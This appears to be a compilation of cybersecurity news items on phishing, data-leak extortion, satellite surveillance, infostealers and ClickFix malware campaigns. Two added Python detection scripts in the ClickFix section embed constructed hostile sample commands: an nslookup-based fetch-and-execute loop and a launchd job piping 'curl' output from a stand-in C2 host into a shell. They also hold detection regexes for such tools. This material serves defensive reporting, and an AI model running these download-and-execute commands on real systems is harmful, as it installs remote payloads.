Those who continue are prompted to enter their wallet recovery phrase. The form accepts 12-, 20-, or 24-word phrases and claims the information is necessary to confirm device ownership. Technical analysis shows that submitted phrases are transmitted through a backend endpoint located at /black/api/send.php on the phishing domain.

With access to the recovery phrase, attackers can restore the wallet on another device and transfer funds.

The method used to identify recipients remains unclear. However, both manufacturers have experienced past data breaches that exposed customer contact information, potentially increasing targeting risks.

Although email-based crypto phishing is common, physical mail scams remain relatively uncommon. In 2021, attackers mailed tampered Ledger devices designed to capture recovery phrases during setup. A similar postal campaign targeting Ledger users was reported again in April.

A recovery phrase, also called a seed phrase, represents the private cryptographic key controlling a cryptocurrency wallet. Anyone who obtains it gains complete control over the associated funds.

Legitimate hardware wallet providers do not request recovery phrases through mail, QR codes, websites, or email. The phrase should only be entered directly on the hardware device during a genuine restoration process.

ShinyHunters Leak Exposes Harvard and UPenn Personal Data


Hacking group ShinyHunters has reportedly published more than a million records stolen from Harvard University and the University of Pennsylvania (UPenn) on its dark web site, putting a vast trove of sensitive personal data within reach of cybercriminals worldwide. The leaked data appears to contain sensitive details about students, employees, alumni, donors, and family members of the breached organizations, widening the circle of affected people well beyond the institutions' direct members. Initial verification has shown that at least some of the leaked data is genuine. 

The UPenn breach is believed to have begun in early November 2025, when the hackers gained access to an employee’s single sign-on (SSO) account; the attackers later claimed to have obtained full access to that account. This essentially turned the SSO account into a master key that allowed the hackers to reach the UPenn VPN system, Salesforce data, the Qlik analytics platform, SAP business intelligence tools, and SharePoint. During the course of the attack, the hackers also used the compromised login credentials to send offensive emails to 700,000 people. Initially, UPenn believed that the emails were fake, but they later turned out to be real.

Harvard confirmed a related compromise roughly three weeks after the UPenn disclosure, tying its own incident to a successful voice phishing (vishing) campaign. In this case, attackers are said to have infiltrated Alumni Affairs and Development systems, exposing data on past and present students, donors, some faculty and staff, and even spouses, partners, and parents of alumni and students. The stolen records reportedly include names, dates of birth, home addresses, phone numbers, estimated net worth, donation history, and sensitive demographic attributes such as race, religion, and sexual orientation.

Unlike traditional ransomware operations that both encrypt systems and steal data, ShinyHunters appears to have focused solely on data theft and extortion, deploying no encryptors in these campaigns. The group allegedly attempted to negotiate payment in cryptocurrency in exchange for promising to delete the stolen files, following the now-common double extortion model. When talks broke down and the universities did not pay, the hackers responded by dumping the data openly on their dark web leak site, amplifying the risk of identity theft, harassment, and targeted scams for victims.

For Harvard and UPenn, the breaches highlight the dangers of over-reliance on SSO accounts and human-centric weaknesses such as vishing, where convincing phone calls trick staff into revealing or approving access. For affected individuals, the publication of highly personal and demographic information raises concerns around fraud, doxxing, discrimination, and reputational harm that could persist for years. The incidents reinforce the need for stronger multifactor authentication, rigorous phishing and vishing awareness training, and tighter controls around high-value institutional accounts holding large volumes of sensitive data.

Inspector Satellites and Orbital Security Risks in Modern Space Infrastructure


Not far from familiar orbits, small satellites labeled as inspectors are starting to raise questions about safety above Earth. Lately, signs point to Russian vehicles moving near critical communication platforms - moves seen as unusually close by many experts. Such actions stir unease across national authorities, military planners, and firms tied to satellite networks worldwide. Little by little, these events reveal a shift: space is no longer just a zone of cooperation, but one where watching, listening, and taking position matter more than before. 

Military and intelligence assessments describe the spacecraft known as Luch-1 and Luch-2 as part of Moscow’s fleet meant for monitoring other orbiting machines. Tracking records show Luch-2, launched in March 2023, moving unusually close to more than a dozen European satellites. High above Earth - about 36,000 km - the craft operates within an orbital belt where units stay locked over one spot on the ground. 

High above Earth, geostationary orbit holds unique importance. Satellites here handle telecom signals, national defense networks, TV broadcasts, storm tracking, along with classified government links. Since each craft stays fixed above one spot on the planet, services remain constant across time zones and emergencies alike. Should an unknown satellite shift close without warning, such movement draws immediate attention from control centers worldwide. 

Security experts in Europe suspect the Luch satellites could be tapping into transmissions from several regional communication platforms. Radio links, tightly aimed between Earth terminals and orbiting craft, carry these exchanges. Sitting close to those pathways - either incoming or outgoing - a satellite might pick up what is sent, particularly when protective coding is weak or old. Gathering such information counts as signal surveillance, known as SIGINT; doing so from space offers ongoing reach into critical traffic streams. 

Worry isn’t limited to public infrastructure alone. Some of these orbiting platforms were said to serve private businesses alongside national agencies, backing up operations like those run by Intelsat. Because they fulfill civilian and strategic roles, their vulnerability grows - today’s armed forces lean on commercial space links for communication channels, moving information, and reaching remote computing resources. When such networks face interference, consequences may ripple through military planning, disaster reaction setups, air traffic messaging, or the synchronization of banking transfers. 

Not just monitoring, but deliberate meddling raises concern among authorities. Close-orbiting satellites might, under certain conditions, disrupt communications through signal manipulation or noise flooding. Even without crashes in space, proven precision in approaching vital infrastructure alters strategic calculations globally. Repeated incidents targeting British military satellite links confirm combat now extends beyond ground-based systems. 

Though updated models now include defenses like shifting signal frequencies, smart antenna adjustments, or improved data coding, security levels differ - especially on legacy commercial units still active. While some agencies and companies pour resources into monitoring tools for orbital activity, spotting odd patterns as they happen remains a priority. Older hardware often lags behind when it comes to resilience against modern threats. 

Nowadays, dependence on space technology keeps growing - so does the link between orbit safety and digital protection. Because global guidelines for close-up satellite activities remain sparse, maneuvers by inspection craft push demands for better rules. These safeguards aim to shield vital networks running everyday online functions. What happens above affects what happens below.

Infostealer Breach Exposes OpenClaw AI Agent Configurations in Emerging Cyber Threat


Cybersecurity experts have uncovered a new incident in which an information-stealing malware successfully extracted sensitive configuration data from OpenClaw, an AI agent platform previously known as Clawdbot and Moltbot. The breach signals a notable expansion in the capabilities of infostealers, now extending beyond traditional credential theft into artificial intelligence environments.

"This finding marks a significant milestone in the evolution of infostealer behavior: the transition from stealing browser credentials to harvesting the 'souls' and identities of personal AI [artificial intelligence] agents," Hudson Rock said.

According to Alon Gal, CTO of Hudson Rock, the malware involved is likely a variant of Vidar, a commercially available information stealer that has been active since late 2018. He shared the details in a statement to The Hacker News.

Investigators clarified that the data theft was not carried out using a specialized OpenClaw-focused module. Instead, the malware leveraged a broad file-harvesting mechanism designed to search for sensitive file extensions and directory paths. Among the compromised files were:
  • openclaw.json – Containing the OpenClaw gateway authentication token, a redacted email address, and the user’s workspace path.
  • device.json – Storing cryptographic keys used for secure pairing and digital signing within the OpenClaw ecosystem.
  • soul.md – Documenting the AI agent’s operational philosophy, behavioral parameters, and ethical guidelines.
Security researchers warned that stealing the gateway token could enable attackers to remotely access a victim’s local OpenClaw instance if exposed online, or impersonate the client in authenticated gateway interactions.

"While the malware may have been looking for standard 'secrets,' it inadvertently struck gold by capturing the entire operational context of the user's AI assistant," Hudson Rock added. "As AI agents like OpenClaw become more integrated into professional workflows, infostealer developers will likely release dedicated modules specifically designed to decrypt and parse these files, much like they do for Chrome or Telegram today."

The disclosure follows mounting scrutiny over OpenClaw’s security posture. The platform’s maintainers recently announced a collaboration with VirusTotal to examine potentially malicious skills uploaded to ClawHub, strengthen its threat model, and introduce misconfiguration auditing tools.

Last week, the OpenSourceMalware research team reported an active ClawHub campaign that bypasses VirusTotal detection. Instead of embedding malicious payloads directly within SKILL.md files, threat actors are hosting malware on imitation OpenClaw websites and using the skills as decoys.

"The shift from embedded payloads to external malware hosting shows threat actors adapting to detection capabilities," security researcher Paul McCarty said. "As AI skill registries grow, they become increasingly attractive targets for supply chain attacks."

Another concern raised by OX Security involves Moltbook, a Reddit-style forum built specifically for AI agents operating on OpenClaw. Researchers found that AI agent accounts created on Moltbook cannot currently be deleted, leaving users without a clear method to remove associated data.

Meanwhile, the STRIKE Threat Intelligence team at SecurityScorecard identified hundreds of thousands of publicly exposed OpenClaw instances, potentially opening the door to remote code execution (RCE) attacks.

"RCE vulnerabilities allow an attacker to send a malicious request to a service and execute arbitrary code on the underlying system," the cybersecurity company said. "When OpenClaw runs with permissions to email, APIs, cloud services, or internal resources, an RCE vulnerability can become a pivot point. A bad actor does not need to break into multiple systems. They need one exposed service that already has authority to act."

Since its launch in November 2025, OpenClaw has experienced rapid adoption, amassing more than 200,000 stars on GitHub. On February 15, 2026, Sam Altman announced that OpenClaw founder Peter Steinberger would be joining OpenAI, stating, "OpenClaw will live in a foundation as an open source project that OpenAI will continue to support."

Hackers Leak 600,000 Customer Records as Canada Goose Opens Investigation



Luxury retail is a rarefied industry where reputations travel faster than seasonal collections. Canada Goose, a brand associated with Arctic-quality craftsmanship and premium exclusivity, is now facing scrutiny from an unexpected part of the internet. 

In a cyber incident that the outerwear company insists did not originate within its walls, a cache of customer transaction data has appeared on a notorious ransomware leak site. The leak has been reported as a compromise of Canada Goose's internal systems, but the luxury clothing brand maintains that its systems have not been breached. 

On ShinyHunters' data leak portal, Canada Goose has been listed as having had 600,000 customer records exfiltrated by the notorious ransomware collective ShinyHunters. This dataset, which is approximately 1.67 gigabytes in size, contains detailed information regarding e-commerce orders, such as customer names, addresses, telephone numbers, and credit card numbers. 

The company's preliminary assessment is that the exposed information relates to historical customer transactions, and that no evidence of a breach of Canada Goose's corporate network has been found. The company says it is actively reviewing the authenticity, origin, and scope of the dataset and will take appropriate measures if any risks to customers emerge. 

The leaked records include partial payment details: card brand names, the final four digits of card numbers and, in some cases, the first six digits of the card number, which identify the issuing bank. The dataset also holds payment authorization metadata, order histories, device and browser information, and transaction values.

Despite the absence of full credit card numbers, cybersecurity experts warn that even partial financial and transactional information can be used to facilitate targeted scams, social engineering attacks, and fraud schemes. For its part, ShinyHunters has publicly denied that the Canada Goose dataset is connected with its recent social engineering campaigns targeting single sign-on environments and cloud infrastructure.

In its claim, the group asserts that the records are a result of a breach of the payment processor in August 2025, a claim which has not been independently verified. According to the structure of the leaked data, it may have been derived from a hosted storefront or external payment processing platform, a fact that may support the group's assertion.

ShinyHunters has established itself as a group that penetrates e-commerce ecosystems, SaaS platforms, and cloud-hosted services, obtaining and publishing large quantities of consumer data in order to exert pressure on the affected companies. Threat intelligence assessments describe ShinyHunters as an established data extortion operation with a history of obtaining and publicizing significant amounts of customer information from leading brands and online platforms.

Since the early 2010s, the group has been associated with a number of high-profile intrusions that frequently target e-commerce ecosystems, software as a service providers, and cloud environments where large datasets can be aggregated and monetized. 

A number of security researchers have also linked the collective with voice phishing and other social-engineering techniques aimed at compromising corporate credentials and shifting into cloud-based systems. In accordance with established patterns, stolen data is typically leveraged for financial coercion, sold on underground marketplaces, or published publicly on the leak portal of the group when ransom demands have not been met. 

It is currently not possible to determine whether Canada Goose customers have been affected in the manner described above. The company has stated it is examining the dataset to determine its authenticity, origin, and breadth before deciding whether customer notifications will be necessary.

The exposed records reportedly contain partial payment card information, including the card brand, the final four digits of the card number and the issuing bank's identification number, as well as payment authorization details. 

Cybersecurity professionals note that, even if full primary account numbers are not presented, truncated financial information, when combined with names, contact information, and transaction histories, can materially increase the success rate of targeted phishing schemes, credential harvesting schemes, and fraud schemes.

Beyond purchase histories, order values, and device and browser metadata, the dataset also contains transaction information. Such contextual information may allow adversaries to identify high spenders and develop convincing, transaction-specific lures that mimic legitimate post-purchase correspondence.

Despite the lack of complete payment card details, this level of granularity increases downstream risk. Separately, independent researchers have recently linked ShinyHunters to a series of social engineering campaigns aimed at compromising single sign-on environments and cloud accounts.

According to the group, when questioned whether there was a correlation between those operations and the Canada Goose data, they denied such a connection, stating that the records were a consequence of a breach at a third-party payment processor dating back to August 2025. This assertion has not been independently verified. 

There is an apparent similarity between the structure of the leaked files, including field labels such as checkout identifiers, shipping line entries, cart tokens, and cancellation metadata, and the export schemas typically generated by hosted storefronts and payment processing platforms. Although this does not establish the provenance of the data definitively, it indicates that the data may have originated within the environment of an external service provider rather than from a direct compromise of the retailer’s internal systems. 

The incident underscores a broader reality facing retailers operating in increasingly interconnected digital supply chains. Even while core systems remain untouched, exposure can arise from third-party integrations that handle payments, order processing, and customer data storage. 

It has been observed by industry analysts that organizations that utilize external commerce and payment infrastructure must conduct rigorous vendor risk assessments, monitor their vendors continuously, and coordinate incident response procedures to limit downstream exposure. 

Customers are advised to maintain increased vigilance against unsolicited communications that reference past purchases or payment activity until the scope of the data is conclusively understood. 

A key takeaway from this episode is that data stewardship goes far beyond corporate boundaries, and resilience relies on ecosystem oversight as much as internal security protocols.

More U.S. Investors Join Legal Dispute With South Korea Over Coupang Data Breach

A fresh wave of U.S.-based investment firms has joined an ongoing legal confrontation with the government of South Korea over its handling of a large-scale cybersecurity incident involving Coupang.

On February 11, it was confirmed that three additional investors, Abrams Capital, Durable Capital Partners, and Foxhaven Asset Management, have formally moved to participate in arbitration proceedings. These firms are aligning with Greenoaks Capital and Altimeter Capital, which had already initiated legal action. By filing official notices, the new claimants are adopting and supporting the earlier case rather than launching a separate one.

At the center of the dispute is an allegation that South Korean authorities unfairly targeted Coupang and, by extension, other U.S.-linked businesses operating in the country. The investors claim that Seoul’s regulatory response following a large-scale consumer data breach amounted to discriminatory treatment that caused severe financial harm.

The controversy traces back to a disclosure made in November, when Coupang announced that personal information belonging to roughly 33 million customers in South Korea had been exposed in a cyber incident. Data breaches of this scale typically involve unauthorized access to customer records, which may include names, contact information, and other identifying details. The announcement triggered widespread public concern, political scrutiny, legal complaints, and cross-border tensions.

According to the investors pursuing arbitration, the government’s actions after the breach significantly affected shareholder value, resulting in losses amounting to billions of dollars. They argue that the regulatory measures taken were disproportionate and damaged investor confidence.

In addition to arbitration efforts, the newly joined investors have sent letters supporting calls for a formal review by U.S. authorities into South Korea’s conduct. Neil Mehta, founder and managing partner of Greenoaks Capital, stated that American policymakers and investors increasingly view the case as an example of the need to defend U.S. companies against what they see as unfair foreign government actions.

Coupang was established in 2010 by Korean-American entrepreneur Bom Kim, a graduate of Harvard University. Over the past decade, it has become the most widely used e-commerce platform in South Korea, surpassing long-established domestic conglomerates such as Shinsegae in online retail presence. The company has expanded beyond traditional online shopping into food delivery services, streaming platforms, and financial technology offerings, further strengthening its footprint in the country’s digital economy.

South Korea’s Justice Ministry has confirmed receipt of additional notices signaling intent to arbitrate. In an official statement, the ministry said it would respond in a systematic and professional manner through its International Investment Dispute Response Team, indicating that the government intends to formally defend its position.

The issue has also contributed to rising trade friction between Washington and Seoul. U.S. President Donald Trump has warned that tariffs on South Korean goods could increase to as much as 25 percent amid broader economic tensions.

Separately, the United States House Committee on the Judiciary recently issued a subpoena to Coupang as part of an ongoing investigation examining alleged discriminatory treatment of American companies operating abroad.

As arbitration proceedings advance, the case is expected to test not only corporate accountability in the wake of major data breaches, but also the strength of international investment protections and the diplomatic balance between two long-standing economic partners.

Microsoft Uncovers DNS-Based ClickFix Variant as Stealer Campaigns Escalate Across Windows and macOS


Microsoft has revealed a new evolution of the ClickFix social engineering technique, where attackers manipulate users into executing commands that initiate a Domain Name System (DNS) lookup to fetch a secondary malicious payload.

In this updated approach, threat actors use the “nslookup” command—short for nameserver lookup—triggered through the Windows Run dialog. The command performs a custom DNS query that retrieves instructions for the next stage of the attack.

ClickFix has gained traction in recent years and is commonly distributed through phishing emails, malvertising campaigns, and drive-by download schemes. Victims are typically redirected to fraudulent landing pages featuring fake CAPTCHA checks or fabricated system alerts, urging them to run commands in the Windows Run dialog or the macOS Terminal app to “resolve” non-existent issues.

The technique has spread rapidly over the past two years because it relies on users unknowingly infecting their own systems, effectively bypassing traditional security safeguards. Its success has led to multiple offshoots, including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

"In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver," the Microsoft Threat Intelligence team said in a series of posts on X. "The output is filtered to extract the Name: DNS response, which is executed as the second-stage payload."

Microsoft explained that this variation uses DNS as a “lightweight staging or signaling channel,” allowing attackers to communicate with their infrastructure while introducing an additional validation layer before delivering the next payload.

"Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic," the Windows maker added.
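As an added example that is not from Microsoft's posts and not part of this article, the following Python triage logic turns the description above into a check over process-creation records. It assumes the records have already been normalised into dictionaries with `parent`, `image` and `cmdline` fields (what Sysmon Event ID 1 or Security 4688 events carry); the sample records, hostnames and IP addresses are constructed. The regexes encode the three traits Microsoft named, an nslookup given an explicit server argument, output filtered for the `Name:` line, and the captured token being executed, plus the Run-dialog launch path (cmd.exe parented by explorer.exe) as a weaker fourth signal; that parent-process mapping is an assumption about how Win+R commands are spawned.

```python
"""Heuristic triage for the DNS-staged ClickFix chain described above.

Assumed input: process-creation records normalised to dicts with keys
'parent', 'image', 'cmdline' (what Sysmon EID 1 / Security 4688 carry).
All sample records below are constructed for illustration.
"""
import re

# nslookup syntax is `nslookup [-opt ...] host [server]`; capture the argument
# string up to any pipe, escaped pipe (^|), quote or closing paren so the
# positional arguments can be counted.
NSLOOKUP_RE = re.compile(r"\bnslookup(?:\.exe)?\b([^|&'^)]*)", re.IGNORECASE)
# findstr/find used to keep only the 'Name:' line of nslookup output.
NAME_FILTER_RE = re.compile(r"\b(?:findstr|find)\b[^|&]*\bName:", re.IGNORECASE)
# A for /f loop whose body runs the captured token (%x or call %x).
EXEC_TOKEN_RE = re.compile(r"\bfor\s+/f\b.*\bdo\s+(?:call\s+)?%", re.IGNORECASE | re.DOTALL)
# Assumption: commands typed into Win+R are spawned by explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}

SAMPLE_EVENTS = [
    {   # constructed: staging chain, explicit resolver, Name: filter, token executed
        "parent": "explorer.exe", "image": "cmd.exe",
        "cmdline": "cmd.exe /c for /f \"tokens=2\" %i in ('nslookup -type=txt "
                   "verify.example.invalid 203.0.113.7 ^| findstr Name:') do %i",
    },
    {   # constructed: routine lookup through the system resolver
        "parent": "cmd.exe", "image": "nslookup.exe",
        "cmdline": "nslookup mail.example.invalid",
    },
    {   # constructed: admin querying a specific resolver, nothing executed
        "parent": "cmd.exe", "image": "nslookup.exe",
        "cmdline": "nslookup -type=mx example.invalid 192.0.2.53",
    },
    {   # constructed: same chain with find instead of findstr and `call`
        "parent": "explorer.exe", "image": "cmd.exe",
        "cmdline": "cmd.exe /c for /f \"tokens=2 delims= \" %a in ('nslookup -q=txt "
                   "x.example.invalid 198.51.100.9 ^| find \"Name:\"') do call %a",
    },
]


def nslookup_explicit_server(cmdline):
    """Return the explicit DNS server passed to nslookup, or None.

    A second positional argument means the query bypasses the system
    resolver, which is the trait Microsoft highlighted.
    """
    m = NSLOOKUP_RE.search(cmdline)
    if not m:
        return None
    positional = [t for t in m.group(1).split() if not t.startswith("-")]
    return positional[1] if len(positional) >= 2 else None


def score_event(event):
    """Return (score, reasons): one point per trait of the chain observed."""
    cmd = event["cmdline"]
    reasons = []
    server = nslookup_explicit_server(cmd)
    if server:
        reasons.append(f"nslookup sent to explicit server {server}")
    if NAME_FILTER_RE.search(cmd):
        reasons.append("output filtered down to the 'Name:' line")
    if EXEC_TOKEN_RE.search(cmd):
        reasons.append("for /f loop executes the captured token")
    if event["parent"].lower() in RUN_DIALOG_PARENTS and event["image"].lower().startswith("cmd"):
        reasons.append("cmd.exe spawned by explorer.exe (Run dialog pattern)")
    return len(reasons), reasons


def triage(events, threshold=3):
    """Return events reaching the threshold; a lone explicit server is not enough."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append({"cmdline": event["cmdline"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], hit["cmdline"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

The threshold matters: administrators do query specific resolvers with `nslookup host server`, so an explicit server alone is kept as a single point rather than an alert, and only the combination with output filtering and execution from a `for /f` loop crosses the line. The same scoring can be fed from a SIEM query instead of the embedded list.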

Following the DNS lookup, the attack chain downloads a ZIP archive from an external server (“azwsappdev[.]com”). Inside is a malicious Python script that conducts system reconnaissance, executes discovery commands, and drops a Visual Basic Script (VBScript). That VBScript launches ModeloRAT—a Python-based remote access trojan previously linked to CrashFix campaigns.

To maintain persistence, the malware creates a Windows shortcut (LNK) file in the user's Startup folder, so it is launched again at every logon.

Lumma Stealer and CastleLoader Activity Intensifies

Separately, Bitdefender has reported a spike in Lumma Stealer operations, fueled by ClickFix-style fake CAPTCHA campaigns. These attacks deploy an AutoIt-based version of CastleLoader, a loader attributed to a threat actor known as GrayBravo (formerly TAG-150).

CastleLoader checks for virtualization environments and certain security software before decrypting and executing the stealer in memory. Beyond ClickFix tactics, attackers are also using websites offering cracked software and pirated movies to lure victims into downloading malicious installers disguised as MP4 files.

Additional campaigns have delivered a counterfeit NSIS installer that runs obfuscated VBA scripts before launching AutoIt components responsible for loading Lumma Stealer. The VBA component establishes scheduled tasks to ensure persistence.

"Despite significant law enforcement disruption efforts in 2025, Lumma Stealer operations continued, demonstrating resilience by rapidly migrating to new hosting providers and adapting alternative loaders and delivery techniques," the Romanian cybersecurity company said. "At the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer spread through delivery chains."

One domain tied to CastleLoader infrastructure (“testdomain123123[.]shop”) was also identified as a Lumma Stealer command-and-control (C2) server, suggesting possible collaboration or shared services between operators. India has recorded the highest number of Lumma infections, followed by France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.

"The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities," Bitdefender said. "The instructions resemble troubleshooting steps or verification workarounds that users may have encountered previously. As a result, victims often fail to recognize that they are manually executing arbitrary code on their own system."

Expanding Threat Landscape: RenEngine, macOS Stealers, and Malvertising

CastleLoader is not the only distribution mechanism in play. Since March 2025, campaigns using RenEngine Loader have spread Lumma Stealer through fake game cheats and pirated applications such as CorelDRAW. In these cases, RenEngine deploys Hijack Loader, which then installs the stealer. Kaspersky data shows primary impact in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France.

Meanwhile, macOS users are increasingly being targeted. A campaign leveraging phishing and malvertising techniques has distributed Odyssey Stealer—a rebranded version of Poseidon Stealer and a fork of Atomic macOS Stealer (AMOS). The malware steals credentials and cryptocurrency wallet data from over 200 browser wallet extensions and multiple desktop wallet apps.

"Beyond credential theft, Odyssey operates as a full remote access trojan," Censys said. "A persistent LaunchDaemon polls the C2 every 60 seconds for commands, supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines."
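As an added example that is not from Censys and not part of this article, the following Python audit scores launchd job plists for the polling persistence the quote describes. It assumes the beacon cadence is expressed through launchd's own `StartInterval` key (an implant can instead loop inside its own binary, which this check would not see) and that the plists have been collected from `/Library/LaunchDaemons` and the `LaunchAgents` directories; both plists, their labels and the C2 hostname below are constructed.

```python
"""Audit launchd job plists for beacon-style persistence (added example).

Assumption: periodic C2 polling is expressed through launchd's StartInterval
key. Both plists below are constructed for illustration, not real samples.
"""
import plistlib
import re

NETWORK_TOOLS = re.compile(r"\b(curl|wget|nscurl|osascript)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash|zsh)\b")
SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh")
WORLD_WRITABLE = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")

# Constructed: a job that fetches and runs commands every 60 seconds.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>curl -fsSL http://c2.example.invalid/task | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>60</integer>
</dict>
</plist>
"""

# Constructed: a nightly backup agent, the kind of job that should not alert.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/local/bin/backup-agent</string>
    <string>--nightly</string>
  </array>
  <key>StartInterval</key><integer>86400</integer>
</dict>
</plist>
"""


def audit_launch_plist(raw, max_poll_seconds=300):
    """Score one plist; each reason is one trait of a beaconing implant."""
    job = plistlib.loads(raw)
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    args = [str(a) for a in args]
    cmd = " ".join(args)
    reasons = []
    interval = job.get("StartInterval")
    if isinstance(interval, int) and 0 < interval <= max_poll_seconds:
        reasons.append(f"StartInterval={interval}s (short polling loop)")
    if args and args[0] in SHELLS and "-c" in args:
        reasons.append("job body is a shell -c one-liner")
    if NETWORK_TOOLS.search(cmd):
        reasons.append("network fetch tool in command line")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("downloaded content piped into a shell")
    if args and args[0].startswith(WORLD_WRITABLE):
        reasons.append("program lives in a world-writable directory")
    return {"label": job.get("Label"), "score": len(reasons), "reasons": reasons}


def audit_all(blobs, threshold=2):
    """Return findings at or above threshold, highest score first."""
    findings = [audit_launch_plist(b) for b in blobs]
    return sorted((f for f in findings if f["score"] >= threshold),
                  key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for finding in audit_all([SUSPECT_PLIST, BENIGN_PLIST]):
        print(finding["label"], finding["score"], "; ".join(finding["reasons"]))
```

A short `StartInterval` on its own is not malicious (monitoring agents poll too), which is why the threshold asks for two traits; on a real fleet the plist bytes would come from reading the launchd directories, and the program path should additionally be checked against code-signing status, which this offline example does not do.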

Other campaigns include:
  • Fake CAPTCHA pages on compromised websites tricking Windows users into running PowerShell commands that deploy StealC.
  • Email phishing attacks using malicious SVG files inside password-protected ZIP archives to deliver the open-source .NET stealer Stealerium.
  • Abuse of generative AI platforms such as Claude to host ClickFix instructions distributed via sponsored Google search results.
  • Fake Medium articles impersonating Apple’s Support Team to spread macOS stealers via domains like “raxelpak[.]com.”

"The C2 domain raxelpak[.]com has URL history going back to 2021, when it appeared to host a safety workwear e-commerce site," MacPaw's Moonlock Lab said. "Whether the domain was hijacked or simply expired and re-registered by the [threat actor] is unclear, but it fits the broader pattern of leveraging aged domains with existing reputation to avoid detection."

Malvertising abuse has also raised concerns. "The ad shows a real, recognized domain (claude.ai), not a spoof or typo-squatted site," AdGuard said. "Clicking the ad leads to a real Claude page, not a phishing copy. The consequence is clear: Google Ads + a well-known trusted platform + technical users with high downstream impact = a potent malware distribution vector."

macOS Threats on the Rise

Security researchers note a broader shift toward targeting Apple systems with advanced infostealers. According to recent analysis, macOS stealers now target more than 100 Chrome cryptocurrency extensions, and attackers are even acquiring legitimate Apple developer signatures to bypass Gatekeeper protections.

"Nearly every macOS stealer prioritizes cryptocurrency theft above all else," the company said. "This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse."

"The 'Macs don't get viruses' assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage."


Volvo Hit in Conduent Breach Affecting 25 Million


A major data breach at business services provider Conduent has spiraled into a large-scale security incident affecting at least 25 million people across the United States, with Volvo Group North America among the latest victims. The breach, originally disclosed in early 2025, is now understood to be far more extensive than first reported, impacting residents in multiple states and exposing sensitive personal data. Texas authorities now estimate that 15 million people have been affected, up from an initial 4 million, while more than 10 million individuals in Oregon have also been caught up in the incident.

Conduent first confirmed in November 2025 that a cyberattack in January 2025 had exposed personal data belonging to over 10 million people. The compromised information included names, addresses, dates of birth, Social Security numbers, and health and insurance details, making it highly valuable for identity theft and fraud. Earlier, in April 2025, the company had revealed that attackers stole names and Social Security numbers during the same January intrusion, highlighting a pattern of gradually escalating disclosures as the scale of the breach became clearer.

Operational disruption accompanied the data exposure, as Conduent disclosed that a January cyberattack caused service outages impacting agencies in multiple U.S. states. Wisconsin and Oklahoma reported issues affecting payments and customer support, underscoring how attacks on back-office providers can cascade into interruptions of public services. Subsequent investigation determined that hackers had maintained access to Conduent’s network from October 21, 2024, to January 13, 2025, giving them ample time to exfiltrate personal data, including Social Security numbers, dates of birth, addresses, and health-related information.

The Safepay ransomware group later claimed responsibility for the attack in February 2025, adding an extortion dimension to the incident. Conduent, which offers printing and mailroom services, document processing, payment integrity, and other back-office support, has been sending breach notifications on behalf of affected clients, including Volvo Group North America. According to a filing with the Maine Attorney General, Volvo reported that 16,991 employees were impacted, and the company said it only learned of the incident in January 2026, many months after the original intrusion window.

In its notification letters, Conduent informed individuals that some of their personal information may have been involved due to services provided to their current or former health plans. The company stated it is not aware of any attempted or actual misuse of the compromised data but is urging recipients to consider steps to protect themselves. As part of its response, Conduent is offering free identity protection services to those affected, reflecting ongoing concern about long-term risks posed by the theft of such highly sensitive information.